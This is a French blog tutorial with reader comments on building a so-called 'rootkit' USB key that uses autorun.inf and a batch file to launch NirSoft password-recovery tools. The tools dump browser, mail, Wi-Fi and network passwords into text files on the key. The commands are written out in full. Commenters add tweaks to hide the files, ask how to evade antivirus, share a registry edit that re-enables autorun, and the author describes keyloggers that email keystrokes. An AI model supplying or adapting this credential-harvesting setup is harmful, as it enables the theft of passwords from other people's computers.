Fév 17, 2014
10 Min
Facile

Aujourd’hui nous allons voir comment créer une clé USB qui récupère les mots de passe d’un ordinateur. Cette clé USB s’exécute automatiquement et récupère la plupart des mots de passe stocker sur votre ordinateur. Il est vraiment très utile surtout quand on a perdu ses mots de passe.


Pour créer notre clé USB on doit suivre les étapes ci-dessous:

Étape 1

Nous allons dans un premier temps télécharger quelque outils qui nous permettent de récupérer les mots de passe des applications les plus courantes. Toutes ces applications sont issues du site Nirsoft (http://www.nirsoft.net/).

Maintenant nous allons placer tous les fichiers .exe  sur notre clé USB.

usb1

Étape 2

Ensuite il faut créer un fichier launch.bat qui va ouvrir automatiquement les programmes de récupération de mot de passe et il va  stocker les résultats dans un fichier texte.
Pour cela : on doit créer un nouveau document texte avec bloc note ou autres et écrire le code ci-dessous.

@echo off
start WebBrowserPassView.exe /stext dossier1/WebBrowserPassView.txt
start mailpv.exe /stext dossier1/mailpv.txt
start WirelessKeyView.exe /stext dossier1/WirelessKeyView.txt
start netpass.exe /stext dossier1/netpass.txt

 

Attention a bien vérifier que les noms des outils correspondent bien aux noms qui sont écrit dans le fichier launch.bat .

Comme vous avez pu le voir dans les lignes ci dessus, lorsque launch.bat sera exécuté , ces logs seront envoyé dans un dossier appelé dossier1. Il nous faut donc créé un nouveau dossier et le nommer dossier1.

 

Étape 3

Maintenant nous allons créer le fichier autorun.inf. Le fichier autorun.inf est un fichier texte enregistré à la racine d’un périphérique de stockage (CD, Clé USB, etc.) permettant d’automatiser le lancement de certains programmes lors de l’insertion d’un périphérique de stockage

Lorsque vous insérez votre clé USB généralement une fenêtre apparaît en nous demandant ce que l’on désire faire !

Dans cette fenêtre nous allons créé une nouvelle option qui nous permettra ( une fois cliquez dessus ) de récupérez les mots de passes de l’ordinateur et de les stockés dans le dossier créé dans l’étape 2 .

Pour réalisez ceci on ouvre un nouveau document texte puis on insère le code suivant :

[autorun]

open=launch.bat

ACTION=’Le nom de la nouvelle option’

Enfin on enregistre notre fichier autorun.inf
Félicitation ! Votre clé USB rootkit est maintenant près à utiliser, il ne vous reste plus qu’à la tester. 😀

60 Commentaires

  1. lolo

    problème!! le fichier .bat ne veut pas s’ouvrir voila le message : « Windows ne trouve pas le fichier « WebBrowserPassView.exe » »
    me dire comment corriger ça
    merci d’avance 😉

    1. Momo Ben

      hello,
      je uis aussi sous windows, 10 et quand je clique sur launch ca me dit votre logiciel nest pas compatible au windows 64

  2. evil soul Edge 666

    bjr a tous je suis un nouveau dans le monde du hack et de l’informatique et ce serais sympa si quelqu’un voulait m’expliquer comment créer un fichier launch.bat svp

  3. Théo

    Ton tutoriel est tout simplement génial, cependant comme j’ai vu dans les commentaires récurrents a ce sujet, je vais répéter:
    Pourquoi la plupart des appli .exe lancer a travers le fichier launch.bat enregistre les données dans des fichiers .cfg et non des fichiers .txt ?
    Merci d’avance de nous aider.
    Et encore merci pour ce super tuto 🙂

  4. axis

    bonjour Ahmed
    Merci pour ce tuto
    moi qui y connait rien en informatique j’ai reussi a le faire
    seul petit probleme c’est que les données enregistré sont stocké en fichiers .cfg

    Quand je les ouvres avec le bloc notes ca me mets :

    [General]

    ShowGridLines=0

    SaveFilterIndex=0

    ShowInfoTip=1

    UseProfileFolder=0

    ProfileFolder=

    WinPos=2C 00 00 00 00 00 00 00 01 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 00 00 00 00 00 00 00 80 02 00 00 E0 01 00 00

    Columns=FA 00 00 00 FA 00 01 00 6E 00 02 00 6E 00 03 00 78 00 04 00 78 00 05 00 78 00 06 00 64 00 07 00

    Sort=0

    donc merci de m’aider svp

  5. Spaaag

    Bonjours, les .txt ne sont pas dans le dossier pour chrome et firefox… En fait il y à que WirelessPassView qui s’affiche!
    Une solution?

  6. Antoine

    Bonjour, je suis débutant et j’ai suivi ce tuto, et je rencontre un problème, apres avoir téléchargé les fichiers et créé le launch.bat et le autorun.inf, quand je lance le launch.bat, il ouvre tout les programme puis crée sur la clé des fichiers .cfg pour chacun des programmes, que dois-je faire ? Merci

  7. pat

    Pour info toutes les nouvelles versions dispo sur nirsoft sont dépourvus des commandes de créations auto des fichiers text (ou tout autre format)

  8. Guillaume

    Le problème c’est que l’autorun ne passe plus! Désormais Windows les bloque de façon automatique pour ceux provenant d’une clé USB… Une idée?

  9. Joo

    Bonjour, je crois que je vais télécharger les logiciels 1 à 1 car le pack ne donne pas les fichiers .exe de la liste ..? ou alors, éclairez ma lanterne please. Merci!

  10. gb88

    bonjour et un immense merci pour ce tuto ! tout fonctionne tres bien mais je suis obligé de lancer le .bat par moi meme car la nouvelle option ne s’affiche pas… je suis sur Windows 8 cela a peut etre une incidence.. quelq’un peut-il m’éclairer svp ? merci !!

  11. giorgio

    salut à tous,

    je suis désolé mais je n’arrive pas à tout comprendre dans l’installation des fichiers. Je n’arrive pas à avoir comme sur l’image ci-dessu (à avoir ces fichiers).
    Tous est écris en anglais….

    j’ai seulement réussi à faire le dossier Autorun et Launch mais RIEN ne marche…

    peut ont m’aider SVP ?

    Merci

  12. Jyfezz

    Bonsoir ! Perso, ça ne marche pas pour mailpv et pspv 🙁
    Et je voulais savoir si cela fonctionne aussi sur marque et quel logiciel faut-il télécharger pour Safari ?

  13. alexy

    bonjour a tous sa ne marche ,je n’arrive pas a recuperai tous les mot de passe d’un coup et je suis sur windows 7
    quelqu’un pourrait m aider svp

  14. Draytane

    top, tres bon tuto 🙂 personellement j’ai préféré faire une ou deux retouches, pour commencé j’ai mis les exe dans un dossier nommé « temp » (pour plus de discrétion)

    mais j’ai laissé le fichier ini et le bat à la racine.
    Puis j’ai modifié le bat comme ceci :

    « mkdir dossier
    start temp/ChromePass.exe /stext dossier/chrome.txt
    start temp/iepv.exe /stext dossier/iexplorer.txt
    start temp/mailpv.exe /stext dossier/mail.txt
    start temp/mspass.exe /stext dossier/mspass.txt
    start temp/PasswordFox.exe /stext dossier/netpass.txt
    start temp/pspv.exe /stext dossier/pspv.txt »
    comme ça il crée le dossier lui même, je trouve cela plus pratique. mais j’ai dû me séparer des exe qui demandaient confirmations :,-(

  15. disqus_nmV7yVNPp3

    salam
    merci pour le tuto deja ^^
    on fait mon probleme c dans l’autorun.inf ca me crée pas une nouvel option quoi que je fasse 🙁

  16. Phaerd

    Bonjour, j’aimerais savoir, peut-on contourner le problème des anti-virus? C’est à dire que dès que j’insère ma clé usb, mon pc la détecte comme malveillante et supprime donc tout les fichiers qui lui paraissent infectés.

  17. Prestige

    salut!
    merci pour votre tuto ca ma vraiment aider je vous remercie.
    j’ai une toute petite question peut être vous paraître idiote mais bon j prend le risque 🙂
    « Le nom de la nouvelle option »  il s’agit de quoi? qu’est ce que j dois marqué?
    merci d’avance et bonne continuation vraiment super votre site.

  18. Prestige

    salut!

    merci pour votre tuto ca ma vraiment aider je vous remercie.
    j’ai une toute petite question peut être vous paraître idiote mais bon j prend le risque 🙂
    « Le nom de la nouvelle option »  il s’agit de quoi? qu’est ce que j dois marqué?
    merci d’avance et bonne continuation vraiment super votre site.

  19. tristan

    Salut, je suis de retour une autre fois. Désolé pour le dérangement mais le lien est toujours mort, il y a t’il un lien torrent ou un site pour l’avoir ? Merci de m’avoir répondu !

      1. SomeOne

        Bonjour, pourrais-tu m’expliquer pourquoi seul WirelessKeyView m’affiche les mots de passe dans un .txt stp?
        merci d’avance 🙂

  20. tristan

    Salut, comme par hasard j’ai pommé tout le pack et j’aimerais le ravoir mais ton lien n’es plus valide il marche plus, si c’est possible de le remettre a nouveaux 

    j’ai essayer de le faire avec le tuto mais il me donne des erreurs. Merci de me répondre très vite. Vous m’avez parler aussi des remotes keylogger, j’aimerai en savoir plus et savoir qu’est ce que c’est.Merci d’avance et continuer comme ça. Ca déchire chaque jour, je lis vos article et celui la est mon préféré 

    répondez moi  vite !
     

    1. Bonsoir tristan, ravie de te revoir ! 🙂  tu as raison le lien du pack est mort, je l’ai changé par un autre, tu peux mnt télécharger tout le pack comme avant !

      En ce qui concerne Remote keylogger, c’est un logiciel espion invisible pour surveiller tous les aspects de l’activité des utilisateurs. Il envoie à l’adresse email indiquée chaque frappe tapé dans un ordinateur et des capture d’écrans à intervalles réguliers… 

  21. Imadnohad

    ‘ Dans l’arborescence de la base de registre aller dans : [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer], modifier la clé suivante, avec la valeur 91 « NoDriveTypeAutoRun »=dword:00000091 enfin redémarre ton PC.’ Peut on faire cette modification pour chaque pc à qui on connecte la clé usb ??

  22. noName

    Salut c’était pour savoir pourquoi quand j’exécute le launch.bat manuellement j’ai 
    « ERROR 5 : Accés refusé »?
    Et aussi savoir pk l’autorun ne propose « le nom de la nouvelle option » dans le panneau qui s’affiche quand on met la clé usb?
    merci bcp et j’adore tes tutos mec!

    1. kivoshki

      Pour voir le nom s’afficher tu dois autoriser l’exécution automatique de l’autorun.
      Pour activer l’autorun, Menu Démarrer -> Exécuter -> regedit.exe

      Tu cherche :[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer]

      et tu modifie la valeur de la clé en 91
      « NoDriveTypeAutoRun »=dword:00000091

  23. Salut tristan, merci pour l’interet que tu portes a notre blog. Alors pour le truc du mail c’est pas possible, parce que le batch est tres limité à l’ensemble des commandes disponible dans cmd.exe par contre il existe des remotes keylogger qui vous permettent de faire ca ! 🙂

    1. tristan

      salut elahmed jaimerai en savoir plus de se que vous avez dit a propos qu’ il existe des remotes keylogger  merci de me repondre vite et bonne journee 

  24. [email protected]

    Bjr,
    Autre chose,
    Quand j’essaye, sur win 7 mêm apres que j’ai modifié le clé de registre, j’obtiens la fenêtre d’exécution automatique qui permet de choisir le type d’applications,
    donc le script ne s’éxecute pas automatiquement !!!

  25. [email protected]

    Salam Ahmed,

    La plupart des outils sont détectés comme Trojan/Virus (Faux alertes)

    La question est comment peut on contourner l’antivirus pour ne pas les détecter !!!
    parceque sinon, sa n’a pas d’importance la fonction d’automatiser les lancement.

    Merci pour le tuto ^^.

    A.M@

  26. Jerzey

    Poy Ahmed,

    Un grand merci à toi !

    Le script « %random% » fonctionne très bien.

    J’ai mis à jour via nirsoft.net et effectivement le mien n’était pas à jour.

    Continue de publier tes articles, je les dévore à chaque fois =)

  27. Ahmed El Jaouari

    Hi Jerzey,

    Merci pour votre lecture de cet article 🙂

    – Alors je commence par le premier problème, c’est a cause de l’autorun, sur certain ordinateur l’autorun est désactivé. Pour activer l’autorun, aller dans Menu Démarrer → Exécuter → (taper regedit.exe)
    Dans l’arborescence de la base de registre aller dans : [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer], modifier la clé suivante, avec la valeur 91 « NoDriveTypeAutoRun »=dword:00000091 enfin redémarre ton PC.

    – Pour le deuxième problème, essaie de télécharger la dernier version du PasswordFox sur http://www.nirsoft.net/utils/passwordfox.html

    – Enfin pour éviter l’écrasement des anciens fichiers, on peut ajouter la commande « %random% » au fichier lunch.bat:
    start mspass.exe /stext Mdp/mspass%random%.txt

    J’espère avoir t’aider Jerzey et a bientôt 😀

  28. Jerzey

    Salut !

    J’ai crée ce rootkit très sympa.

    Cependant voici mes observations et problèmes rencontrés (en espérant que tu puisses les résoudre) :

    – L’autorun + .bat sont bien implanté sur mon usb, cependant ils ne se lancent pas tout seul quand l’usb est inséré, il faut que l’user du PC, de manière voulue, clique sur l’icône launch.

    – Le soft pour Firefox ne fonctionne cependant pas. J’ai toujours un message d’erreur sur tous les pc utilisé.

    – Y aurait-il possibilité d’ajouter quelques lignes de code afin que le script crée un nouveau fichier texte nommé par exemple : MDP1 MDP2 etc etc plutôt que d’écraser à chaque fois l’ancien ? (Je ne connais pas la prog, néanmoins je pourrais chercher à faire ça, j’ai déjà fait pas mal de .bat mais je dois jouer avec les livres de commande :))